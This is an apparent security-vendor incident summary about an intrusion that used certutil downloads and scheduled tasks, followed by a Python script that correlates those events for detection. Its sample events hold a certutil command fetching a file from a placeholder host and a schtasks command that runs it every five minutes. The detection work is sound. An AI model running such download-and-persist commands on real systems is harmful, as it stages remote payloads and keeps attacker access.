Investigating Intrusions From Intriguing Exploits

Summary

On 02 February 2023, an alert triggered in a Huntress-protected environment. At first glance, the alert itself was fairly generic – a combination of certutil using the urlcache flag to retrieve a remote resource and follow-on scheduled task creation – but further analysis revealed a more interesting set of circumstances. By investigating the event in question and pursuing root cause analysis (RCA), Huntress was able to link this intrusion to a recently announced vulnerability as well as to a long-running post-exploitation framework associated with prominent ransomware groups. By combining quick initial triage and response with deeper investigation, Huntress was able to mitigate and prevent an intrusion that would likely have led to a disruptive ransomware incident.
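The alert described above is a correlation of two individually noisy signals: certutil invoked with the urlcache flag, followed by scheduled task creation on the same host. The script below is an added example (not Huntress's detection logic) that runs that correlation over a few constructed process-creation events; the event fields, hostnames and command lines are assumptions built for the demonstration.

```python
"""Correlate certutil -urlcache downloads with follow-on scheduled-task creation."""
import re
from datetime import datetime, timedelta

# Constructed sample process-creation events (hypothetical hosts and paths,
# not telemetry from the incident described on the page).
EVENTS = [
    {"ts": "2023-02-02T14:01:10", "host": "WS01",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/p.txt C:\\Users\\Public\\p.txt"},
    {"ts": "2023-02-02T14:02:45", "host": "WS01",
     "cmdline": "schtasks.exe /create /tn Updater /tr C:\\Users\\Public\\p.txt /sc minute /mo 5"},
    {"ts": "2023-02-02T09:00:00", "host": "WS02",
     "cmdline": "certutil.exe -verify cert.cer"},                  # benign certutil use
    {"ts": "2023-02-02T11:00:00", "host": "WS03",
     "cmdline": "schtasks.exe /create /tn Backup /tr backup.exe /sc daily"},  # task with no download
]

# certutil with the urlcache flag (remote download) and schtasks /create.
URLCACHE = re.compile(r"certutil(\.exe)?\b.*-urlcache", re.IGNORECASE)
TASK_CREATE = re.compile(r"schtasks(\.exe)?\b.*/create", re.IGNORECASE)


def correlate(events, window_minutes=30):
    """Return (host, download_cmdline, task_cmdline) tuples for every schtasks
    /create that follows a certutil -urlcache download on the same host within
    window_minutes. Events are sorted by timestamp first, so input order is free."""
    ordered = sorted(((datetime.fromisoformat(e["ts"]), e) for e in events),
                     key=lambda pair: pair[0])
    downloads = {}  # host -> list of (timestamp, cmdline) for urlcache downloads
    hits = []
    for ts, e in ordered:
        cmd = e["cmdline"]
        if URLCACHE.search(cmd):
            downloads.setdefault(e["host"], []).append((ts, cmd))
        elif TASK_CREATE.search(cmd):
            for dl_ts, dl_cmd in downloads.get(e["host"], []):
                if timedelta(0) <= ts - dl_ts <= timedelta(minutes=window_minutes):
                    hits.append((e["host"], dl_cmd, cmd))
    return hits


if __name__ == "__main__":
    for host, download, task in correlate(EVENTS):
        print(f"[{host}] certutil download followed by task creation:")
        print(f"  {download}")
        print(f"  {task}")
```

Only WS01 is flagged: the benign certutil call on WS02 and the standalone task on WS03 fall through, which is the point of correlating the two signals rather than alerting on either alone.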